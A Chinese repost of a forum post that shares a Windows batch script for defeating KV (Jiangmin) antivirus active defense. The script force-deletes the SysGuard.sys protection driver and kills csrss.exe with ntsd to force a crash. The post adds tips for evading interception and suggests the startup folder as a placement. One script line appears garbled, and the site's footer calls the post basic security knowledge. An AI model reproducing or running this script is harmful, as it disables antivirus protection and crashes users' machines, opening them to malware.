明輝手游網(wǎng)中心:是一個免費提供流行視頻軟件教程、在線學(xué)習(xí)分享的學(xué)習(xí)平臺!

批處理戰(zhàn)KV主防

[摘要]批處理戰(zhàn)KV主防 今早起來一邊早飯一邊試驗的。 代碼見下:@echo off del %systemroot%\system32\drivers\SysGuard.sys /f /q /s...

批處理戰(zhàn)KV主防

今早起來一邊早飯一邊試驗的。 代碼見下:

@echo off

del %systemroot%\system32\drivers\SysGuard.sys /f /q /s

set app_name=csrss.exe

echo 查找進(jìn)程%app_name%,準(zhǔn)備死機...

(tasklist /nh findstr /i %app_name%) (goto dead)

:dead

ntsd -c -q -pn %app_name%

原理我自己也不是太明白就不多說了, 實驗結(jié)果好像管用, 我用虛擬機和真實機都分別試驗了下, 還不錯。 直接點的批處理腳本, 如果轉(zhuǎn)成EXE效果不保證了(沒有實驗)。 但是由于有關(guān)機回寫, 必須強迫死機, 雖然重啟后KV的變態(tài)進(jìn)程守護(hù)不管用了(可以用任務(wù)管理器試試), 但是在重啟之前你還得把善后工作做好, 準(zhǔn)備來日重生。 有幾點得注意:

1、不能直接用批處理寫注冊表(雖然可以還原SSDT之后用API寫, 但是不是我們追求的純粹R3手段)

2、最好不要把bat放在EXE里, 因為運行時KV十有八九可以攔截到

3、最好的地方可能是啟動文件夾, 或許還有些其他修改手段

的確是個很娛樂且沒有什么實用價值的手段...大家可以娛樂下, 不過考慮到每個人的機子效果或許不同, 不用報有太大希望。

特別強調(diào):KV08/09用戶, 試驗時一定要把C:\Windows\system32\drivers\SysGuard.sys拷貝個到其它地方備份, 如果本實驗真的成功了, KV就實效了。 只有拷貝回去下次重啟即可恢復(fù), 或者重新安裝。


上面是電腦上網(wǎng)安全的一些基礎(chǔ)常識,學(xué)習(xí)了安全知識,幾乎可以讓你免費電腦中毒的煩擾。




標(biāo)簽:批處理戰(zhàn)KV主防